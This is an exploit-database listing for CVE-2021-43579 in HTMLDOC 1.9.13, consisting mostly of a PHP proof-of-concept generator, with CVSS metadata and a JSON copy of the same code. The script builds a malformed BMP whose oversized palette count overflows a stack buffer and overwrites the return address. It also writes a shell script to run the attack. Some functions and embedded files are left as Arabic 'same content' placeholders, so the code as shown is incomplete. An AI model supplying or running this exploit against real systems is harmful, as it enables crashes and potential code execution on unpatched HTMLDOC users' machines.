📄 HTMLDOC 1.9.13 Stack Buffer Overflow_PACKETSTORM:212871

7.8 / 10

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Description

Proof of concept exploit written in PHP for HTMLDOC version 1.9.13 that generates a malicious BMP file that will trigger a stack buffer overflow vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:212871

Published Dec 16, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : HTMLDOC 1.9.13 Generates a malicious BMP file that triggers a stack buffer overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/michaelrsweet/htmldoc |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/211123/ & CVE-2021-43579

[+] Summary : The BMP reader in HTMLDOC uses a fixed 1024-byte stack buffer for the color palette.
Exploit Trigger: Setting biClrUsed = 0xffffffff (-1) in the BMP header causes fread() to read excessive data, overflowing the stack buffer.

Payload: Overwrites saved return address with 0x4242424242424242 ('BBBBBBBB').

[+] POC : php poc.php

htmldoc --webpage -f output.pdf poc_cve_2021_43579.html

<?php
/**
* CVE-2021-43579 HTMLDOC Vulnerability PoC Generator
* Author: indoushka
*/

class HTMLDOC_Exploit_Generator {

private $payload_size = 1088;
private $filename_prefix = 'poc_cve_2021_43579';
private $verbose = true;

public function generate_malicious_bmp($filename = null) {
if ($filename === null) {
$filename = $this->filename_prefix . '.bmp';
}

$payload = str_repeat('A', 1080) . str_repeat('B', 8);
$file_size = 54 + strlen($payload);
$bmp_header = $this->create_bmp_header($file_size);
$bmp_info_header = $this->create_bmp_info_header();
$bmp_data = $bmp_header . $bmp_info_header . $payload;
$bytes_written = file_put_contents($filename, $bmp_data);

if ($bytes_written === false) {
throw new Exception("Failed to write BMP file: $filename");
}

if ($this->verbose) {
echo "[+] Generated malicious BMP file: $filename\n";
}

return $filename;
}

private function create_bmp_header($file_size) {
$header = 'BM';
$header .= pack('V', $file_size);
$header .= pack('v', 0);
$header .= pack('v', 0);
$header .= pack('V', 54);

if (strlen($header) !== 14) {
throw new Exception("BITMAPFILEHEADER must be exactly 14 bytes");
}
return $header;
}

private function create_bmp_info_header() {
$info_header = pack('V', 40);
$info_header .= pack('V', 1);
$info_header .= pack('V', 1);
$info_header .= pack('v', 1);
$info_header .= pack('v', 24);
$info_header .= pack('V', 0);
$info_header .= pack('V', 0);
$info_header .= pack('V', 0);
$info_header .= pack('V', 0);
$info_header .= pack('V', 0xffffffff);
$info_header .= pack('V', 0);

if (strlen($info_header) !== 40) {
throw new Exception("BITMAPINFOHEADER must be exactly 40 bytes");
}
return $info_header;
}

public function generate_html_file($bmp_filename = null, $html_filename = null) {
if ($bmp_filename === null) {
$bmp_filename = $this->filename_prefix . '.bmp';
}
if ($html_filename === null) {
$html_filename = $this->filename_prefix . '.html';
}

$html_content = <<<HTML
<!DOCTYPE html>
... (نفس المحتوى بالضبط) ...
HTML;

$bytes_written = file_put_contents($html_filename, $html_content);

if ($bytes_written === false) {
throw new Exception("Failed to write HTML file: $html_filename");
}

return $html_filename;
}

public function generate_test_script() {
$script_content = <<<BASH
#!/bin/bash
... (نفس المحتوى بالضبط لكن مع هذا التصحيح) ...

php -r '
include "poc.php";
\$exploit = new HTMLDOC_Exploit_Generator();
\$exploit->generate_malicious_bmp("exploit.bmp");
\$exploit->generate_html_file("exploit.bmp", "exploit.html");
'

BASH;

file_put_contents('test_exploit.sh', $script_content);
chmod('test_exploit.sh', 0755);
}

public function display_help() {
... (نفس المحتوى) ...
}

public function run($args) {
... (نفس المحتوى) ...
}
}

if (php_sapi_name() === 'cli') {
$generator = new HTMLDOC_Exploit_Generator();
$generator->run($argv);
} else {
echo "<pre>This script is designed to run from the command line.</pre>";
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-16T18:53:49",
    "description": "Proof of concept exploit written in PHP for HTMLDOC version 1.9.13 that generates a malicious BMP file that will trigger a stack buffer overflow vulnerability...",
    "published": "2025-12-16T00:00:00",
    "modified": "2025-12-16T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 HTMLDOC 1.9.13 Stack Buffer Overflow",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212871",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2021-43579"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : HTMLDOC 1.9.13 Generates a malicious BMP file that triggers a stack buffer overflow                                         |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://github.com/michaelrsweet/htmldoc                                                                                    |\n    =============================================================================================================================================\n    \n    [+] References :  https://packetstorm.news/files/id/211123/ & CVE-2021-43579\n    \n    [+] Summary : The BMP reader in HTMLDOC uses a fixed 1024-byte stack buffer for the color palette.\n                 Exploit Trigger: Setting biClrUsed = 0xffffffff (-1) in the BMP header causes fread() to read excessive data, overflowing the stack buffer.\n    \n    Payload: Overwrites saved return address with 0x4242424242424242 ('BBBBBBBB').\n    \n    [+]  POC :\tphp poc.php\n    \n                htmldoc --webpage -f output.pdf poc_cve_2021_43579.html\n    \n    \n    \n    <?php\n    /**\n     * CVE-2021-43579 HTMLDOC Vulnerability PoC Generator\n     * Author: indoushka\n     */\n    \n    class HTMLDOC_Exploit_Generator {\n        \n        private $payload_size = 1088;\n        private $filename_prefix = 'poc_cve_2021_43579';\n        private $verbose = true;\n        \n        public function generate_malicious_bmp($filename = null) {\n            if ($filename === null) {\n                $filename = $this->filename_prefix . '.bmp';\n            }\n            \n            $payload = str_repeat('A', 1080) . str_repeat('B', 8);\n            $file_size = 54 + strlen($payload);\n            $bmp_header = $this->create_bmp_header($file_size);\n            $bmp_info_header = $this->create_bmp_info_header();\n            $bmp_data = $bmp_header . $bmp_info_header . $payload;\n            $bytes_written = file_put_contents($filename, $bmp_data);\n            \n            if ($bytes_written === false) {\n                throw new Exception(\"Failed to write BMP file: $filename\");\n            }\n            \n            if ($this->verbose) {\n                echo \"[+] Generated malicious BMP file: $filename\\n\";\n            }\n            \n            return $filename;\n        }\n    \n        private function create_bmp_header($file_size) {\n            $header = 'BM';\n            $header .= pack('V', $file_size);\n            $header .= pack('v', 0);\n            $header .= pack('v', 0);\n            $header .= pack('V', 54);\n            \n            if (strlen($header) !== 14) {\n                throw new Exception(\"BITMAPFILEHEADER must be exactly 14 bytes\");\n            }\n            return $header;\n        }\n    \n        private function create_bmp_info_header() {\n            $info_header  = pack('V', 40);\n            $info_header .= pack('V', 1);\n            $info_header .= pack('V', 1);\n            $info_header .= pack('v', 1);\n            $info_header .= pack('v', 24);\n            $info_header .= pack('V', 0);\n            $info_header .= pack('V', 0);\n            $info_header .= pack('V', 0);\n            $info_header .= pack('V', 0);\n            $info_header .= pack('V', 0xffffffff);\n            $info_header .= pack('V', 0);\n            \n            if (strlen($info_header) !== 40) {\n                throw new Exception(\"BITMAPINFOHEADER must be exactly 40 bytes\");\n            }\n            return $info_header;\n        }\n    \n        public function generate_html_file($bmp_filename = null, $html_filename = null) {\n            if ($bmp_filename === null) {\n                $bmp_filename = $this->filename_prefix . '.bmp';\n            }\n            if ($html_filename === null) {\n                $html_filename = $this->filename_prefix . '.html';\n            }\n    \n            $html_content = <<<HTML\n    <!DOCTYPE html>\n    ... (\u0646\u0641\u0633 \u0627\u0644\u0645\u062d\u062a\u0648\u0649 \u0628\u0627\u0644\u0636\u0628\u0637) ...\n    HTML;\n    \n            $bytes_written = file_put_contents($html_filename, $html_content);\n    \n            if ($bytes_written === false) {\n                throw new Exception(\"Failed to write HTML file: $html_filename\");\n            }\n    \n            return $html_filename;\n        }\n    \n        public function generate_test_script() {\n            $script_content = <<<BASH\n    #!/bin/bash\n    ... (\u0646\u0641\u0633 \u0627\u0644\u0645\u062d\u062a\u0648\u0649 \u0628\u0627\u0644\u0636\u0628\u0637 \u0644\u0643\u0646 \u0645\u0639 \u0647\u0630\u0627 \u0627\u0644\u062a\u0635\u062d\u064a\u062d) ...\n    \n    php -r '\n    include \"poc.php\";\n    \\$exploit = new HTMLDOC_Exploit_Generator();\n    \\$exploit->generate_malicious_bmp(\"exploit.bmp\");\n    \\$exploit->generate_html_file(\"exploit.bmp\", \"exploit.html\");\n    '\n    \n    BASH;\n    \n            file_put_contents('test_exploit.sh', $script_content);\n            chmod('test_exploit.sh', 0755);\n        }\n    \n        public function display_help() {\n           ... (\u0646\u0641\u0633 \u0627\u0644\u0645\u062d\u062a\u0648\u0649) ...\n        }\n    \n        public function run($args) {\n            ... (\u0646\u0641\u0633 \u0627\u0644\u0645\u062d\u062a\u0648\u0649) ...\n        }\n    }\n    \n    if (php_sapi_name() === 'cli') {\n        $generator = new HTMLDOC_Exploit_Generator();\n        $generator->run($argv);\n    } else {\n        echo \"<pre>This script is designed to run from the command line.</pre>\";\n    }\n    ?>\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212871",
    "cvss": {
        "score": 7.8,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212871/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply